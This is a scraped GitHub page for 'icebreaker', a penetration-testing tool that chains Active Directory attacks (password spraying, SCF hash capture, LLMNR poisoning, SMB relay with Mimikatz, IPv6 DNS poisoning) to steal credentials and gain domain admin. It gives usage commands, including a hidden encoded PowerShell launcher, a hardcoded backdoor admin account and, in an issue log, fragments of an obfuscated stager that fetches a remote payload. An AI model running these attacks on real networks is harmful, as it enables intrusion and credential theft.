danmcinerney / icebreaker Goto Github PK

Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment

License: MIT License

Python 1.07% Shell 0.06% PowerShell 98.85% Dockerfile 0.02%

icebreaker's Introduction

icebreaker

Break the ice with that cute Active Directory environment over there. When you're cold and alone staring in at an Active Directory party but don't possess even a single AD credential to join the fun, this tool's for you.

Sequentially automates 5 internal network attacks against Active Directory to deliver you plaintext credentials. Use the --auto option to automatically acquire domain admin privileges after gaining a foothold.

Summary Details

The following attacks are performed sequentially until the fourth and fifth attacks which run in parallel and indefinitely.

Reverse bruteforce
- Automatically acquires a list of usernames and tests each one with two of the most common AD passwords (more than two attempts may trigger account lockout policies)
Upload to network shares
- Capture users' passwords with malicious file uploads to available network shares
Poison broadcast network protocols
- Uses common network protocols to trick users' computers into sending you passwords
Man-in-the-middle SMB connections
- Performs remote command execution against AD computers in order to gather passwords
Poison IPv6 DNS
- Exploits DNS to trick AD computers into sending their users' passwords to you

Technical Details

All NetNTLMv2 hashes which are captured in the techniques below are autocracked with JohnTheRipper and an AD-specific password list of 1 million in length.

Reverse bruteforce
- Uses rpcclient to find hosts that accept null SMB sessions
- Uses ridenum to find valid usernames via RID cycling on null SMB hosts
- Can use theHarvester to gather additional potential usernames from a specified internet domain
- Performs a 2 password reverse bruteforce of found usernames or you can specify a password list to use
- Default passwords tested: P@ssw0rd and <current_season><year>, e.g., Spring2018
SCF upload
- Uses Nmap to find anonymously writeable network shares via NSE script smb-enum-shares
- Writes an SCF file to the share with a file icon path that points to your machine
- When an AD user opens the share in File Explorer their NetNTLMv2 hash is sent to you
LLMNR/NBTNS/mDNS poisoning
- Uses Responder.py to poison the layer 2 broadcast/multicast network protocols (LLMNR, NBT-NS, mDNS) and capture NetNTLMv2 hashes
SMB relay
- Uses ntlmrelayx.py and Responder.py to relay SMB hashes
- Uses Nmap to identify vulnerable relay targets via the NSE script smb-security-mode
- Vulnerable targets will have SMBv1 enabled and SMB signing disabled
- Successful relaying of a hash will result in the capture of a user's NetNTLMv2 hash which will be autocracked
- If a user hash is relayed to a machine and that user is a local administrator, command execution will occur and the following will be remotely performed:
  - Add an administrative user - icebreaker:P@ssword123456
  - Run an obfuscated and AMSI bypassing version of Mimikatz
  - Mimikatz output is parsed for NTLM hashes and plaintext passwords
  - Run an obfuscated and AMSI bypassing version of Invoke-PowerDump for SAM hashes
  - Output is parsed for NTLM hashes
IPv6 DNS poison
- Uses mitm6 and ntlmrelayx.py to poison IPv6 DNS in order to capture NetNTLMv2 user hashes
- Creates fake WPAD server with authentication
- IPv6 DNS is enabled by default in Active Directory environments
- Note: this can cause network connectivity issues for users

How It Works

It will perform the above 5 network attacks in order. Reverse bruteforcing and SCF file uploads usually go pretty quick, then it lingers on attack 3, Responder.py, for 10 min by default. After that amount of time, or the user-specified amount of time has passed, it will move on to the final two attacks which are run in parallel and indefinitely.

If any hosts are discovered to allow null SMB sessions, icebreaker will use ridenum to perform RID cycling for valid usernames. If you use the "-d <somedomain.com>" option, theHarvester will scrape any email addresses from the specified website. Any email usernames that are AD-compatible will be added to the reverse bruteforce username list. Icebreaker uses the asyncio library to perform the reverse bruteforce using the linux tool rpcclient using 10 async workers.

The SCF upload attack abuses Shell Command Files against anonymously writeable network shares. SCFs are files that can perform basic actions like showing the desktop or opening a File Explorer window. They have the curious property of allowing you to set its file icon to a network path. If you set this network path to your own machine, users who open the file share in File Explorer will automatically send their NetNTLMv2 password hash to you. Icebreaker uses the Nmap script smb-enum-shares to find anonymously writeable shares then automatically generates and uploads the payloaded SCF.

Attack 3 uses Responder.py to poison LLMNR, NBT-NS, and mDNS multicast/broadcast protocols. When users navigate to a nonexistent network path, Responder will tell them your attacker machine is the correct path. The user's NetNTLMv2 password hash is now yours. Responder will capture hashes sent via the SCF attack, but the next attack is generally more useful for capturing SCF hashes because it has the potential of using the hash for command execution.

SMB relay is an old network attack where attackers place themselves inbetween the SMB client and the SMB server. This allows attackers to capture and relay NetNTLMv2 hashes to hosts that have SMBv1 enabled and SMB signing disabled. ntlmrelayx.py from the Impacket library is used to relay while Responder.py is used to man-in-the-middle SMB connections. Should the SMB client user have administrative rights to any host on the network that has SMB signing disabled, ntlmrelayx.py will perform command execution on that host.

Once ntlmrelayx relays a captured hash it will run a base64-encoded powershell command that first adds an administrative user (icebreaker:P@ssword123456) then runs an obfuscated and AMSI-bypassing version of Mimikatz, followed by an obfuscated and AMSI-bypassing version of Invoke-PowerDump. The output of Invoke-Mimikatz and Invoke-PowerDump is parsed for plaintext passwords or NTLM hashes and delivered to the user in the standard output as well as in the found-passwords.txt file. NTLM hashes, unlike NetNTLMv2 hashes, can be used just like a plaintext password for authentication to other AD hosts. The one caveat is that ever since Microsoft’s KB2871997 patch, only the builtin RID 500 local administrator account can be used in pass-the-hash attacks.

The final attack uses the tool mitm6 to perform a man-in-the-middle IPv6 DNS attack against the whole network. This forces hosts on the network to use the attacker's machine as their DNS server. Once set as their DNS server, the attacker serves malicious WPAD proxy setting files to the victims and gathers their NetNTLMv2 hashes. These hashes are relayed using ntlmrelayx.py for further remote code execution possibilities. One thing to note is that this attack is prone to causing issues on the network. It often causes certificate errors on client machines in the browser. It'll also likely slow the network down. The beauty of this attack, however, is that Windows AD environments are vulnerable by default.

If icebreaker is run with the --auto [tmux/xterm] flag, then upon reaching attack 4 icebreaker will run Empire and DeathStar in either a tmux session or xterm windows. With this option, instead of running mimikatz on the remote host that we relayed the hash to, icebreaker will add an administrative user then run Empire's powershell launcher code to get an agent on the remote machine. DeathStar will use this agent to automate the process of achieving domain admin. The Empire and DeathStar will not close when you exit icebreaker.

Password cracking is done with JohnTheRipper and a custom wordlist. The origin of this list is from the merged.txt which is every password from the SecLists GitHub account combined. The wordlist was pruned and includes no passwords with: all lowercase, all uppercase, all symbols, less than 7 characters, more than 32 characters. These rules conform to the default Active Directory password requirements and brought the list from 20 million to just over 1 million which makes password cracking extremely fast.

Installation

As root:

./setup.sh
pipenv install --three
pipenv shell

You might get an error after running pipenv install. Update to a version of pipenv higher than 11.9.0 if that is the case. You can git clone pipenv from github and just apt-get remove python-pipenv && python setup.py install from within the folder.

Docker Usage

Still a few bugs to work out with the docker image so this is likely to error for you but it's almost there. From the Git Repo:

docker build --rm -t danmcinerney/icebreaker .
docker run danmcinery/icebreaker

Or append the commands you'd normally add to icebreaker (don't forget to map volumes):

docker run -v $(pwd)/logs:/icebreaker/logs -v $(pwd)/hashes:/icebreaker/hashes -v $(pwd)/icebreaker-scan.xml:/icebreaker/icebreaker-scan.xml -v $(pwd)/submodules:/icebreaker/submodules -e PYTHONUNBUFFERED=0 danmcinerney/icebreaker -x icebreaker-scan.xml

**Note: You'll want to map ports for listeners with docker's -p <host>:<container> flag.

Usage

Run as root. Read from a newline separated list of IP addresses (single IPs or CIDR ranges) and instead of having ntlmrelayx add a user and mimikatz the victim upon hash relay, have it execute a custom command on the victim machine. In this example we're giving it a command similar to what Empire might give us for a powershell launcher one-liner.

./icebreaker -l targets.txt -c "powershell -nop -w hidden -exec bypass -enc WwFk..."

Read from a hostlist, tell Responder to use the eth0 interface rather than the default gateway interface, let Responder run for 30m instead of the usual 10m, and run the default ntlmrelayx post-relay commands to dump the SAM off the victim server.

./icebreaker -l targets.txt -i eth0 -t 30 -c default

Use an Nmap XML output file, skip all five attacks plus don't autocrack hashes, and use a custom password list for the reverse bruteforce attack (note that since this example is skipping attack 1 via '-s rid' the password list specified won't even get used; this is just used as an example)

./icebreaker.py -x nmapscan.xml -s rid,scf,llmnr,relay,dns,crack -p /home/user/password-list.txt

Fire-and-forget usage: input targets file, scrape companydomain.com for email usernames to be added to the reverse bruteforce attack, skip mitm6's IPv6 DNS poisoning, and run Empire and DeathStar in either tmux or xterm windows once attack 4 starts in order to gain automated domain admin. The goal of this usage is to fire off the command Monday at 9am then go take a short, uninterrupted break until Friday at 4:30pm at which point we come back to a domain admin shell waiting for us. We skip attack 5 (mitm6) because it can sometimes cause network issues and we don't want angry clients interrupting our hard-earned break.

./icebreaker.py -l targets.txt -d companydomain.com -s dns --auto [tmux/xterm]

icebreaker's People

Contributors

Stargazers

Watchers

Forkers

hackmycontrolsystem qsdj av1080p jymcheong chouaibhm thetraker deeby jack51706 h0k5 zshell subzeroking f0r34chb3t4 shantanu561993 puppycodes minkione invokethreatguy b1gw00d tantantut y0d4a ovidsec mlynchcogent izogain chubbymaggie alionderpentest topotam void-in projectboot thegh0stship submergenc3 fb11 hack-the-box datadrug samyoyo techlord-rce 4n6strider kcsec pabit longjohncoder rishdang oksbsb r0cknrolla tai-euler roobixx ion-storm rarw0lf an2ni vysecurity olivierh59500 jaikishantulswani 3453-315h poeblu mark-ppb libertyunix jkohrman kk9599 w00t3k jontargaryen tigretis xeaon kartikeyap pixelza justwee peterg75 yashodhank romad3r m00zh33 dm2333 vaginessa jamesshew jbarcia djhohnstein virgilcj analyticsearch linuxdemo heikipikker ashr ykankaya tim1512 cerebralmischief dannymas diggold phin3has 94883r wisdark mgcfish ii0 meuzukonis icepaule sam9318 ro9ueadmin slooppe r3dfruitrollup dipsec attackgithub sasqwatch johnbishop172 ankushgoel27 theseanis lorentzenman leomatias

icebreaker's Issues

Attack 1: RID Cycling fails

udo ./icebreaker.py -l target.txt -c "net user /add User1 [email protected]"
[] Nmap running: 0.0 min
[] Nmap running: 0.5 min
[] Nmap running: 1.0 min
[] Nmap running: 1.5 min
[] Nmap running: 2.0 min
[] Nmap running: 2.5 min
[*] Parsing hosts
[+] SMB open:

[] Attack 1: RID cycling in null SMB sessions into reverse bruteforce
[] Checking for null SMB sessions
[*] Example command that will run: rpcclient -U "" 172.46.100.9 -N -c "lsaquery"
/home/menace/icebreaker/./icebreaker.py:339: RuntimeWarning: coroutine 'create_subprocess_shell' was never awaited
p = yield from asyncio.create_subprocess_shell(cmd, stdout=PIPE, stderr=PIPE)
RuntimeWarning: Enable tracemalloc to get the object allocation traceback
Traceback (most recent call last):
File "/home/menace/icebreaker/./icebreaker.py", line 1603, in
main(report, args)
File "/home/menace/icebreaker/./icebreaker.py", line 1539, in main
prev_creds, prev_users, domains = smb_reverse_brute(loop, hosts, args, passwords, prev_creds, prev_users, DCs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/menace/icebreaker/./icebreaker.py", line 597, in smb_reverse_brute
rpc_output = async_get_outputs(loop, dom_cmds)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/menace/icebreaker/./icebreaker.py", line 370, in async_get_outputs
output += loop.run_until_complete(asyncio.gather(*coros))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/asyncio/base_events.py", line 653, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/home/menace/icebreaker/./icebreaker.py", line 339, in get_output
p = yield from asyncio.create_subprocess_shell(cmd, stdout=PIPE, stderr=PIPE)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: cannot 'yield from' a coroutine object in a non-coroutine generator

Username enhancement for reverse bruteforce & Kerberoasting

Hi Dan,

Firstly, wow, what an amazing tool. I can see this making my life so much easier! Thanks so much. I have a couple of suggestions for improvements/enhancements:

It would be great to have an option to provide a list of addition usernames/emails in a text file that have been enumerated separately. This could also be automated by adding tool such as LinkedInt/Prowl/InSpy (Can do multiple as they use different methods, linkedint by company name on the site, prowl by search engine results). Incorporating these to scrape & generate usernames based on LinkedIn OSINT.
I know DeathStar uses bloodhound & empire to escalate through the network, but would it be possible to include Kerberoasting in here somewhere? Part of initial access using GetUserSPNs to get the tickets, run them through John with your custom list and add successes into Deathstar to give it more to work with? Putting the kerberos tickets into a separate file thats clearly marked would be great so they can be extracted & run through a more intensive cracking process if needed.

RID Cycling fails

[] Checking for usernames. This may take a bit...
[] Example command that will run: python2 /home/tester/Documents/icebreaker/submodules/ridenum/ridenum.py 10.3.10.43 500 50000 | tee -a logs/ridenum.log
Traceback (most recent call last):
File "./icebreaker.py", line 1602, in
main(report, args)
File "./icebreaker.py", line 1538, in main
prev_creds, prev_users, domains = smb_reverse_brute(loop, hosts, args, passwords, prev_creds, prev_users, DCs)
File "./icebreaker.py", line 618, in smb_reverse_brute
ip_users, prev_users = get_usernames(ridenum_output, prev_users)
File "./icebreaker.py", line 449, in get_usernames
out_lines = host.splitlines()
AttributeError: 'NoneType' object has no attribute 'splitlines'

pls. create a docker and an empire post module..

would be really nice..

RID Fails

If I exclude the rid we are good, but if i do the default, I get:

] Attack 1: RID cycling in null SMB sessions into reverse bruteforce
[] Checking for null SMB sessions
[*] Example command that will run: rpcclient -U "" 10.207.4.3 -N -c "lsaquery"
Traceback (most recent call last):
File "./icebreaker.py", line 1536, in
main(report, args)
File "./icebreaker.py", line 1472, in main
prev_creds, prev_users, domains = smb_reverse_brute(loop, hosts, args, passwords, prev_creds, prev_users, DCs)
File "./icebreaker.py", line 589, in smb_reverse_brute
null_sess_hosts = get_null_sess_hosts(rpc_output)
File "./icebreaker.py", line 399, in get_null_sess_hosts
if 'Domain Name:' in out:
TypeError: argument of type 'NoneType' is not iterable

Thoughts????

error find john

Traceback (most recent call last):
File "./icebreaker.py", line 1536, in
main(report, args)
File "./icebreaker.py", line 1503, in main
prev_creds, new_lines = parse_responder_log(args, prev_lines, prev_creds)
File "./icebreaker.py", line 1092, in parse_responder_log
prev_creds = get_cracked_pwds(prev_creds)
File "./icebreaker.py", line 924, in get_cracked_pwds
out, err = Popen('submodules/JohnTheRipper/run/john --show hashes/{}'.format(x).split(), stdout=PIPE, stderr=PIPE).communicate()
File "/usr/lib/python3.6/subprocess.py", line 709, in init
restore_signals, start_new_session)
File "/usr/lib/python3.6/subprocess.py", line 1344, in _execute_child
raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'submodules/JohnTheRipper/run/john': 'submodules/JohnTheRipper/run/john'

Install fails when creating virtual enviroment

[*] Running: pipenv install --three
Creating a virtualenv for this project…
Using /usr/bin/python3 to create virtualenv…
⠋Traceback (most recent call last):
File "/usr/local/bin/pew", line 7, in
from pew.pew import pew
File "/usr/local/lib/python2.7/dist-packages/pew/init.py", line 3, in
from . import pew
File "/usr/local/lib/python2.7/dist-packages/pew/pew.py", line 16, in
from backports.shutil_get_terminal_size import get_terminal_size
ImportError: No module named shutil_get_terminal_size

Virtualenv location:
Creating a virtualenv for this project…
⠙Traceback (most recent call last):
File "/usr/local/bin/pew", line 7, in
from pew.pew import pew
File "/usr/local/lib/python2.7/dist-packages/pew/init.py", line 3, in
from . import pew
File "/usr/local/lib/python2.7/dist-packages/pew/pew.py", line 16, in
from backports.shutil_get_terminal_size import get_terminal_size
ImportError: No module named shutil_get_terminal_size

Linux 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 GNU/Linux

Installation on Kali not working

I wanted to play around with icebreaker. As I had problems with pipenv on my regluar kali i downloaded the latest rolling release virtualbox ova.

I did a dist upgrade and updated everything to latest (and created a snapshot after that).

Then I cloned the icebreaker repo - and did ./setup.sh and then pipenv shell.

Unfortunately the same error as with my regular kali box:

(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker# ./icebreaker.py 
Traceback (most recent call last):
  File "./icebreaker.py", line 13, in <module>
    import libtmux
ModuleNotFoundError: No module named 'libtmux'
(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker#

So there seems to be a problem with the pipenv.

If I try to recreate the enviornment I get

(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker# pipenv install --three
Virtualenv already exists!
Remove existing virtualenv? [Y/n]: y
Removing existing virtualenv…
Creating a virtualenv for this project…
Using /usr/bin/python3 (3.6.4) to create virtualenv…
⠋Running virtualenv with interpreter /usr/bin/python3
Using base prefix '/usr'
New python executable in /root/.local/share/virtualenvs/icebreaker-pYXGQqZV/bin/python3
Also creating executable in /root/.local/share/virtualenvs/icebreaker-pYXGQqZV/bin/python
Installing setuptools, pip, wheel...done.

Virtualenv location: /root/.local/share/virtualenvs/icebreaker-pYXGQqZV
Pipfile.lock not found, creating…
Locking [dev-packages] dependencies…
ne 75, in <module>
    main()
  File "/usr/local/lib/python2.7/dist-packages/pipenv/resolver.py", line 30, in main
    import pipenv.core
  File "/usr/local/lib/python2.7/dist-packages/pipenv/../pipenv/__init__.py", line 21, in <module>
    from .cli import cli
  File "/usr/local/lib/python2.7/dist-packages/pipenv/../pipenv/cli.py", line 9, in <module>
    import delegator
  File "/usr/local/lib/python2.7/dist-packages/pipenv/vendor/delegator.py", line 8, in <module>
    from pexpect.popen_spawn import PopenSpawn
  File "/usr/local/lib/python2.7/dist-packages/pipenv/vendor/pexpect/popen_spawn.py", line 14, in <module>
    from Queue import Queue, Empty  # Python 2
ModuleNotFoundError: No module named 'Queue'

/usr/local/lib/python2.7/dist-packages/pipenv/utils.py:1186: ResourceWarning: Implicitly cleaning up <TemporaryDirectory '/tmp/pipenv-pWdkyP-requirements'>
  warnings.warn(warn_message, ResourceWarning)
(icebreaker-pYXGQqZV) root@kali:/opt/icebreaker#

I also found a mention in the closed issues that it can help to do pipenv install --two followed by pipenv install --three which isn't fixing the error in case of a fresh, updated kali install.

Do you have any further advise on how to install/fix the python problems on kali linux?

Non UTF-8 chars in Responder-Session.log causes crash

If the Responder-Session.log contains chars that are not UTF-8, when the program tries to call readlines() it crashes. This can be fixed by appended error='replace' to the arguments when calling open on the file.

Feature request: allow option to specify an interface to attack

Very cool tool! Just having this one minor issue.

I am specifying a host list that has only targets that can be reached via eth1 on my machine, but it is starting responder to only listen on eth0. I don't have the option of specifying which interface I want.

[Responder] 01/22/2018 03:44:02 PM - Responder Started: ['submodules/Responder/Responder.py', '-wrd', '-I', 'eth0']

ModuleNotFoundError: No module named 'libtmux'

Hi,
When I install and run "python3 icebreaker.py -l targets.txt" I get "ModuleNotFoundError: No module named 'libtmux'" . Anyone had experience of this and know what I'm doing wrong?
Thanks.

Option to not add local admin when running

Hey, would it be possible to have a flag to not add the local admin flag when running? As I run into lots of solutions which kill the connection immediately if this happens. Many thanks!

smb-security-mode fails for Windows 10.

The script identified SMB signed hosts using smb-signing-mode. This script will not work for identifying Windows 10. You will need to update the script to include "smb2-security-mode".

(accidentally opened issue in wrong git repo. please remove. sorry!)

sorry, accidentally opened an issue here. was working on another github project. please remove this. Sorry!

Allow user to specify added username/password

Just an enhancement/extra thing to work on for the future. It would be nice to be able to specify the added username and password if exploitation is successful. It will be useful in larger scope engagements where 'icebreaker' will not be quite as stealthy and the password can follow domain password complexity requirements.

Also reduce the possibility that third parties can potentially access internet facing devices that have had the icebreaker account added with the hardcoded credentials.

*Edit for grammar

remote cracking for hashes with hashcat like autoresp does

Would it be possible to have icebreaker send hashes to be cracked on a remote server over ssh as opposed to locally by JTR?

login after successful attack

hey there
It tells me,it automatically created an account "icebreaker:P@ssword123456"
but I somehow can't login via psexec:
] 10.20.23.1:445 - Authenticating to 10.20.23.1:445 as user 'icebreaker'...
[] 10.20.23.1:445 - Uploading payload...
[-] 10.20.23.1:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

it's the AD in my test environment.

nmap XML input is broken

The function run_nse_scripts declares a positional argument hosts then immediately overwrites it with hosts = [], throwing an index error. If this is fixed, another issue arises: TypeError: sequence item 0: expected str instance, NmapHost found stemming from line 133 (report = NmapScan(hosts)) in icebreaker.py, I assume this is because the list of hosts passed to the function on line 1457 contains a list of NmapHost objects, not a list of IPs in str format.

Migrate off of rpcclient dependancy for RID cycling attack

Per the research by SensePost here:

https://sensepost.com/blog/2018/a-new-look-at-null-sessions-and-user-enumeration/

"I found that when I used rpcclient against known vulnerable systems, that it would often produce error messages and fail to enumerate user information. In a penetration test scenario, this behaviour could make one believe that the remote system does not allow one to access the IPC$ share and execute RPC calls, while it could be possible."

"By default, rpcclient first opens the LSARPC pipe and then requests the remote system to execute the LsaOpenPolicy and LsaQueryInformationPolicy functions. If an anonymous user is not allowed to execute these function, rpcclient exits. Most RPC calls however don’t require the information provided by these functions. In our test for example, the smb-enum-users script could still execute QueryDisplayInfo, and enumerate user information, without access to these functions."

It seems that relying on rcpcclient could produce a false negative.

Ntlmrlayx.py shows 'SMB SessionError' and throws unhandled exception

I am trying to use ntlm relaying to get domain admin in my virtual environment. However, ntlmrelayx.py first shows 'SMB SessionError' and then throws an un-handled exception.

[*] Authenticating against smb://192.168.106.131 as SAFEDOMAIN\Administrator SUCCEED
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
Method invocation failed because 
[System.Collections.Generic.Dictionary`2[[System.String, mscorlib, 
Version=4.0.0.0, Culture=neutral, 
PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=b77a5c561934e089]]] does not contain a method 
named 'nEW'.
At line:1 char:374
+ ... ionLogging']=0}$Val=[CollectIOnS.GEneRIc.DICTioNary[sTRINg,SySTeM.OBjEct]
]::nEW( ...
+                    
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound

You cannot call a method on a null-valued expression.
At line:1 char:441
+ ... BjEct]]::nEW();$val.ADd('EnableScriptB'+'lockLogging',0);$vAL.ADd('Enable
ScriptB ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:483
+ ... ockLogging',0);$vAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKE
Y_LOCAL ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

 Exception calling "DownloadData" with "1" argument(s): "Unable to connect to 
 the remote server"
 At line:1 char:1657
 + ... uVhm0oeKRKg=");$daTa=$WC.DoWNLoADDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAt
a[4..$D ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException

Cannot index into a null array.
At line:1 char:1689
+ ... 
DDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R 
$ ...
+                    ~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:1 char:1705
+ ... IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R $DAta 
($IV+$K))|I ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

~ : The term '~' is not recognized as the name of a cmdlet, function, script 
file, or operable program. Check the spelling of the name, or if a path was 
included, verify that the path is correct and try again.
At line:1 char:1
+ ~
+ ~
+ CategoryInfo          : ObjectNotFound: (~:String) [], CommandNotFoundEx 
 ception
+ FullyQualifiedErrorId : CommandNotFoundException